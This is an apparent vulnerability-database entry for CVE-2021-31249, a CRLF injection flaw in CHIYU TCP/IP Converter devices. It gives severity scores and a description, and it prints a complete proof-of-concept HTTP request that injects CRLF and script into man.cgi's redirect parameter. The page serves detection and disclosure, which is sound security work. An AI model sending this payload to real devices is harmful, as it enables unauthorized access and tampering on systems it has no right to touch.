🔙 목록으로 돌아가기

CVE-2021-31249: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection

TitleCHIYU TCP/IP Converter - Carriage Return Line Feed Injection
Authorgeeknik
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation.
RemediationApply the latest security patches or updates provided by the vendor to fix the vulnerability.
CVSS Score6.5
EPSS Score0.9258
CVE IDCVE-2021-31249
CWE IDCWE-74
Tags cve2021 cve chiyu crlf iot chiyu-tech vuln

🔍 Vulnerability Description

CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port&TF_port&B_mac_apply=APPLY HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31249.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-31249.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A